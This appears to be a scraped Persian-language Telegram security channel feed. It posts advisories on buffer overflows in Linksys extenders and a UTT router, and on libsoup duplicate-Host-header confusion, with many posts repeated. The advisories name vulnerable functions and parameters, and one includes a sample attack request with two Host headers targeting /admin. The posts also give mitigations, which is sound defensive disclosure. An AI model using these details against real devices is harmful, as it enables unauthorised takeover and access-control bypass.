🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریتی دستگاه، پارامتر
clientsname_0 را با دادهای بسیار طولانیتر از ظرفیت بافر مربوطه مقداردهی میکند.این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه میدهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریقشده توسط خود منتقل کند. در نتیجه، مهاجم میتواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیبپذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14135
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14135
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در تابع
دستگاههای تحت تاثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای فریمور آسیبپذیر:
• 1.0.013.001 / 1.0.04.001 / 1.0.04.002 / 1.1.05.003 / 1.2.07.001
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی روی دستگاه شود.
این به این معناست که مهاجم میتواند:
• کنترل کامل دستگاه را به دست بگیرد.
• تمام ترافیک شبکه را شنود و دستکاری کند.
• از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده کند.
• بدافزار یا درهای پشتی (Backdoor) روی دستگاه نصب کند.
• با ایجاد اختلال در عملکرد دستگاه، سرویسدهی شبکه را مختل کند (Denial of Service).
با توجه به در دسترس بودن اکسپلویت عمومی و عدم پاسخگویی شرکت سازنده، ریسک این آسیبپذیری بسیار بالا ارزیابی میشود.
سناریوی حمله:
یک مهاجم که به شبکه محلی دسترسی دارد (یا در صورتی که پنل مدیریت دستگاه روی اینترنت در دسترس باشد، از راه دور)، یک درخواست HTTP دستکاریشده به سمت رابط وب دستگاه ارسال میکند.
این درخواست شامل یک مقدار بسیار طولانی برای پارامتر
این مقدار طولانی، فضای اختصاصدادهشده در پشته (Stack) را پر کرده و دادههای حیاتی مجاور، مانند آدرس بازگشت (Return Address)، را بازنویسی میکند.
در نهایت، این بازنویسی باعث میشود که کد مخرب مهاجم (Shellcode) که در درخواست جاسازی شده است، با سطح دسترسی سیستمعامل دستگاه اجرا شود و کنترل کامل دستگاه در اختیار مهاجم قرار گیرد.
---
توصیههای امنیتی:
با توجه به اینکه شرکت Linksys هیچ وصله امنیتی برای این آسیبپذیری منتشر نکرده است، اقدامات زیر جهت کاهش ریسک ضروری است:
محدود کردن دسترسی به پنل مدیریت دستگاه فقط از طریق شبکه داخلی و اطمینان از عدم در دسترس بودن آن بر روی اینترنت.
استفاده از کلمه عبور قوی و منحصربهفرد برای پنل مدیریت.
در صورت امکان، جایگزینی دستگاه با مدلی که پشتیبانی امنیتی فعال دارد.
نظارت مستمر بر ترافیک شبکه برای شناسایی هرگونه فعالیت مشکوک.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14135
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14135 در برخی از دستگاههای توسعهدهنده محدوده (Range Extender) شرکت Linksys شناسایی شده است.این ضعف امنیتی در تابع
AP_get_wired_clientlist_setClientsName در فایل mod_form.so وجود دارد. مهاجم از راه دور میتواند با ارسال یک مقدار دستکاریشده و طولانی برای پارامتر clientsname_0، باعث سرریز بافر شده و کنترل اجرای برنامه را به دست گیرد.دستگاههای تحت تاثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای فریمور آسیبپذیر:
• 1.0.013.001 / 1.0.04.001 / 1.0.04.002 / 1.1.05.003 / 1.2.07.001
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی روی دستگاه شود.
این به این معناست که مهاجم میتواند:
• کنترل کامل دستگاه را به دست بگیرد.
• تمام ترافیک شبکه را شنود و دستکاری کند.
• از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده کند.
• بدافزار یا درهای پشتی (Backdoor) روی دستگاه نصب کند.
• با ایجاد اختلال در عملکرد دستگاه، سرویسدهی شبکه را مختل کند (Denial of Service).
با توجه به در دسترس بودن اکسپلویت عمومی و عدم پاسخگویی شرکت سازنده، ریسک این آسیبپذیری بسیار بالا ارزیابی میشود.
سناریوی حمله:
یک مهاجم که به شبکه محلی دسترسی دارد (یا در صورتی که پنل مدیریت دستگاه روی اینترنت در دسترس باشد، از راه دور)، یک درخواست HTTP دستکاریشده به سمت رابط وب دستگاه ارسال میکند.
این درخواست شامل یک مقدار بسیار طولانی برای پارامتر
clientsname_0 است که مربوط به قابلیت "تغییر نام کلاینتهای متصل با سیم" میباشد.این مقدار طولانی، فضای اختصاصدادهشده در پشته (Stack) را پر کرده و دادههای حیاتی مجاور، مانند آدرس بازگشت (Return Address)، را بازنویسی میکند.
در نهایت، این بازنویسی باعث میشود که کد مخرب مهاجم (Shellcode) که در درخواست جاسازی شده است، با سطح دسترسی سیستمعامل دستگاه اجرا شود و کنترل کامل دستگاه در اختیار مهاجم قرار گیرد.
---
توصیههای امنیتی:
با توجه به اینکه شرکت Linksys هیچ وصله امنیتی برای این آسیبپذیری منتشر نکرده است، اقدامات زیر جهت کاهش ریسک ضروری است:
محدود کردن دسترسی به پنل مدیریت دستگاه فقط از طریق شبکه داخلی و اطمینان از عدم در دسترس بودن آن بر روی اینترنت.
استفاده از کلمه عبور قوی و منحصربهفرد برای پنل مدیریت.
در صورت امکان، جایگزینی دستگاه با مدلی که پشتیبانی امنیتی فعال دارد.
نظارت مستمر بر ترافیک شبکه برای شناسایی هرگونه فعالیت مشکوک.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14136
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14136
🔬 شرح آسیبپذیری:
یک آسیبپذیری امنیتی حیاتی از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در فایل
---
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه میدهد تا کد دلخواه خود را از راه دور بر روی دستگاه اجرا کند (Remote Code Execution - RCE). این به معنای دستیابی به کنترل کامل دستگاه آسیبپذیر است.
با توجه به اینکه کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز تاکنون هیچ واکنشی نشان نداده و بهروزرسانی امنیتی ارائه نکرده است، ریسک بهرهبرداری از این ضعف بسیار بالا تلقی میشود. پیامدهای اصلی شامل شنود ترافیک شبکه، از کار انداختن سرویس (DoS) و استفاده از دستگاه به عنوان نقطهای برای حمله به سایر تجهیزات شبکه داخلی میباشد.
---
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریت وب دستگاه، تابع آسیبپذیر را هدف قرار میدهد.
در این درخواست، پارامتر
هنگام پردازش این ورودی نامعتبر، سرریز بافر در پشته رخ میدهد و آدرس بازگشت تابع بازنویسی میشود. در نتیجه، جریان اجرای برنامه به سمت کدهای مخرب تزریقشده توسط مهاجم منحرف شده و نهایتاً دسترسی کامل به سیستمعامل دستگاه برای او فراهم میگردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-14136
🔬 شرح آسیبپذیری:
یک آسیبپذیری امنیتی حیاتی از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14136 در طیف وسیعی از تقویتکنندههای (Extenders) شرکت Linksys شناسایی شده است.این ضعف امنیتی در فایل
mod_form.so و به طور مشخص در تابع RE2000v2Repeater_get_wired_clientlist_setClientsName قرار دارد. مهاجم میتواند با دستکاری آرگومان clientsname_0 و ارسال یک ورودی با طول بیش از حد مجاز، باعث سرریز بافر شده و کنترل جریان اجرای برنامه را در دست بگیرد.---
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه میدهد تا کد دلخواه خود را از راه دور بر روی دستگاه اجرا کند (Remote Code Execution - RCE). این به معنای دستیابی به کنترل کامل دستگاه آسیبپذیر است.
با توجه به اینکه کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز تاکنون هیچ واکنشی نشان نداده و بهروزرسانی امنیتی ارائه نکرده است، ریسک بهرهبرداری از این ضعف بسیار بالا تلقی میشود. پیامدهای اصلی شامل شنود ترافیک شبکه، از کار انداختن سرویس (DoS) و استفاده از دستگاه به عنوان نقطهای برای حمله به سایر تجهیزات شبکه داخلی میباشد.
---
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریت وب دستگاه، تابع آسیبپذیر را هدف قرار میدهد.
در این درخواست، پارامتر
clientsname_0 با یک رشته بسیار طولانی که حاوی کدهای مخرب (Shellcode) است، مقداردهی میشود.هنگام پردازش این ورودی نامعتبر، سرریز بافر در پشته رخ میدهد و آدرس بازگشت تابع بازنویسی میشود. در نتیجه، جریان اجرای برنامه به سمت کدهای مخرب تزریقشده توسط مهاجم منحرف شده و نهایتاً دسترسی کامل به سیستمعامل دستگاه برای او فراهم میگردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14141
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری حیاتی در روترهای UTT
شناسه:
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر (Buffer Overflow) در روترهای UTT 进取 520W نسخه
یک مهاجم غیرمجاز و از راه دور (Remote) میتواند با ارسال یک درخواست دستکاریشده و ارسال مقادیر بیش از حد طولانی به پارامتر
💥 تأثیر:
موفقیت در اکسپلویت این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی (root) بر روی دستگاه شود.
این امر به مهاجم اجازه میدهد تا کنترل کامل روتر را در دست بگیرد، ترافیک شبکه را شنود یا دستکاری کند، به شبکه داخلی نفوذ کرده و دستگاه را به بخشی از یک باتنت تبدیل نماید. همچنین، این حمله میتواند به سادگی منجر به از کار افتادن کامل دستگاه (Denial of Service) شود.
🎭 سناریوی حمله:
مهاجم با شناسایی یک روتر UTT آسیبپذیر در اینترنت، یک درخواست HTTP مخرب به آدرس
تابع آسیبپذیر
نکته مهم: کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده هیچ واکنشی به گزارش اولیه نشان نداده است، که این موضوع ریسک بهرهبرداری از آن را به شدت افزایش میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری حیاتی در روترهای UTT
شناسه:
CVE-2025-14141---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر (Buffer Overflow) در روترهای UTT 进取 520W نسخه
1.7.7-180627 شناسایی شده است. این ضعف امنیتی ناشی از استفاده ناامن از تابع strcpy در فایل /goform/formArpBindConfig میباشد.یک مهاجم غیرمجاز و از راه دور (Remote) میتواند با ارسال یک درخواست دستکاریشده و ارسال مقادیر بیش از حد طولانی به پارامتر
pools، باعث سرریز شدن بافر حافظه شده و شرایط را برای اجرای کد دلخواه فراهم کند.💥 تأثیر:
موفقیت در اکسپلویت این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی (root) بر روی دستگاه شود.
این امر به مهاجم اجازه میدهد تا کنترل کامل روتر را در دست بگیرد، ترافیک شبکه را شنود یا دستکاری کند، به شبکه داخلی نفوذ کرده و دستگاه را به بخشی از یک باتنت تبدیل نماید. همچنین، این حمله میتواند به سادگی منجر به از کار افتادن کامل دستگاه (Denial of Service) شود.
🎭 سناریوی حمله:
مهاجم با شناسایی یک روتر UTT آسیبپذیر در اینترنت، یک درخواست HTTP مخرب به آدرس
/goform/formArpBindConfig ارسال میکند. این درخواست حاوی یک رشته بسیار طولانی و مهندسیشده در پارامتر pools است که شامل یک شلکد (shellcode) نیز میباشد.تابع آسیبپذیر
strcpy بدون بررسی طول ورودی، تلاش میکند این رشته را در یک بافر با اندازه ثابت کپی کند. این عمل باعث سرریز بافر شده و آدرس بازگشت (return address) در پشته (stack) را با آدرس شلکد مهاجم بازنویسی میکند. در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، شلکد مهاجم اجرا شده و یک دسترسی از راه دور برای او ایجاد میشود.نکته مهم: کد اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده هیچ واکنشی به گزارش اولیه نشان نداده است، که این موضوع ریسک بهرهبرداری از آن را به شدت افزایش میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
❤1
🚨 New Vulnerability Alert: CVE-2025-14523
🟠 Risk Level: HIGH (Score: 8.2)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.2)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14523
🟠 Risk Level: HIGH (Score: 8.2)
تحلیل آسیبپذیری حرفهای: CVE-2025-14523
در این گزارش، به بررسی آسیبپذیری جدیدی میپردازیم که میتواند تأثیرات قابل توجهی بر امنیت برنامههای وب داشته باشد.
📝 توضیح آسیبپذیری:
این آسیبپذیری (CVE-2025-14523) مربوط به نقص در نحوه مدیریت هدرهای HTTP توسط کتابخانه
💥 پیامدها و تأثیرات:
این آسیبپذیری میتواند منجر به چندین نوع حمله جدی شود:
• Request Smuggling: امکان اجرای حملات قاچاق درخواست را فراهم میکند که میتواند به دسترسی غیرمجاز به منابع داخلی، دور زدن فایروالهای وب (WAF) و سایر مکانیزمهای امنیتی منجر شود.
• Cache Poisoning: مهاجمان میتوانند محتوای مخرب را در کشهای وب سرور یا CDNها تزریق کنند، که سپس به سایر کاربران ارائه میشود و به حملات فیشینگ یا انتشار بدافزار کمک میکند.
• Bypassing Host-Based Access Controls: قابلیت دور زدن کنترلهای دسترسی مبتنی بر میزبان را به مهاجم میدهد. این به معنای دور زدن محدودیتهای امنیتی است که بر اساس نام میزبان اعمال شدهاند و دسترسی به منابع محافظتشده را ممکن میسازد.
🕵️ سناریوی حمله:
فرض کنید یک وبسایت دارای یک پروکسی جلویی است که درخواستها را به چندین سرویسدهنده پشتی مختلف هدایت میکند. مهاجم با ارسال یک درخواست HTTP که شامل دو هدر
در این سناریو:
• پروکسی جلویی: پروکسی، هدر
• سرویسدهنده پشتی (Backend) با libsoup: هنگامی که درخواست به سرویسدهنده پشتی میرسد، کتابخانه
این عدم تطابق، سرویسدهنده پشتی را فریب میدهد تا فکر کند درخواست برای
برای کاهش این ریسک، توصیه میشود که تمامی سیستمها و پروکسیهای درگیر در پردازش درخواستهای HTTP، بهویژه آنهایی که از
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.2)
تحلیل آسیبپذیری حرفهای: CVE-2025-14523
در این گزارش، به بررسی آسیبپذیری جدیدی میپردازیم که میتواند تأثیرات قابل توجهی بر امنیت برنامههای وب داشته باشد.
📝 توضیح آسیبپذیری:
این آسیبپذیری (CVE-2025-14523) مربوط به نقص در نحوه مدیریت هدرهای HTTP توسط کتابخانه
libsoup است. این نقص به مهاجم اجازه میدهد تا چندین هدر Host: را در یک درخواست HTTP ارسال کند. در حالی که libsoup آخرین رخداد این هدر را برای پردازش سمت سرور برمیگرداند، بسیاری از پروکسیهای جلویی (front proxies) رایج، اولین هدر Host: را مورد توجه قرار میدهند. این ناهماهنگی منجر به سردرگمی میزبان مجازی (vhost confusion) میشود؛ به این معنی که پروکسی درخواست را به یک سرویسدهنده پشتی (backend) خاص هدایت میکند، اما سرویسدهنده پشتی آن را مربوط به یک میزبان کاملاً متفاوت تفسیر میکند.💥 پیامدها و تأثیرات:
این آسیبپذیری میتواند منجر به چندین نوع حمله جدی شود:
• Request Smuggling: امکان اجرای حملات قاچاق درخواست را فراهم میکند که میتواند به دسترسی غیرمجاز به منابع داخلی، دور زدن فایروالهای وب (WAF) و سایر مکانیزمهای امنیتی منجر شود.
• Cache Poisoning: مهاجمان میتوانند محتوای مخرب را در کشهای وب سرور یا CDNها تزریق کنند، که سپس به سایر کاربران ارائه میشود و به حملات فیشینگ یا انتشار بدافزار کمک میکند.
• Bypassing Host-Based Access Controls: قابلیت دور زدن کنترلهای دسترسی مبتنی بر میزبان را به مهاجم میدهد. این به معنای دور زدن محدودیتهای امنیتی است که بر اساس نام میزبان اعمال شدهاند و دسترسی به منابع محافظتشده را ممکن میسازد.
🕵️ سناریوی حمله:
فرض کنید یک وبسایت دارای یک پروکسی جلویی است که درخواستها را به چندین سرویسدهنده پشتی مختلف هدایت میکند. مهاجم با ارسال یک درخواست HTTP که شامل دو هدر
Host: متفاوت است، این نقص را مورد بهرهبرداری قرار میدهد:GET /admin HTTP/1.1Host: attacker.comHost: legitimate-target.comUser-Agent: Mozilla/5.0 (...)Connection: close(...)در این سناریو:
• پروکسی جلویی: پروکسی، هدر
Host: attacker.com (اولین مورد) را میخواند و درخواست را بر اساس آن به یک سرویسدهنده پشتی هدایت میکند. فرض کنید این پروکسی برای دامنه attacker.com تنظیم نشده و آن را به سرویسدهنده پشتی پیشفرض ارسال میکند که ممکن است مثلاً legitimate-target.com باشد.• سرویسدهنده پشتی (Backend) با libsoup: هنگامی که درخواست به سرویسدهنده پشتی میرسد، کتابخانه
libsoup هدر Host: legitimate-target.com (آخرین مورد) را برای پردازش نهایی در نظر میگیرد.این عدم تطابق، سرویسدهنده پشتی را فریب میدهد تا فکر کند درخواست برای
legitimate-target.com است و ممکن است کنترلهای دسترسی میزبانمحور مربوط به legitimate-target.com را اعمال کند. با دستکاری URL و هدرهای دیگر، مهاجم میتواند به منابعی (مانند صفحات مدیریت /admin) دسترسی پیدا کند که در حالت عادی محافظتشدهاند یا حملاتی نظیر Cache Poisoning را انجام دهد.برای کاهش این ریسک، توصیه میشود که تمامی سیستمها و پروکسیهای درگیر در پردازش درخواستهای HTTP، بهویژه آنهایی که از
libsoup استفاده میکنند، به آخرین نسخه بهروزرسانی شوند و پیکربندیهای امنیتی برای جلوگیری از پذیرش هدرهای Host: تکراری بررسی و اعمال شوند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
❤1
سلام وقت عزیزان بخیر
چند روزی به علت تغییرات روی ساختار اسیب پذیری ها کانال توضیحات نمیذاشت در رابطه با CVE های جدید که مشکلش رو برطرف کردیم
@RedTeamCVE
@RedTeamAPT1
چند روزی به علت تغییرات روی ساختار اسیب پذیری ها کانال توضیحات نمیذاشت در رابطه با CVE های جدید که مشکلش رو برطرف کردیم
@RedTeamCVE
@RedTeamAPT1
❤1👍1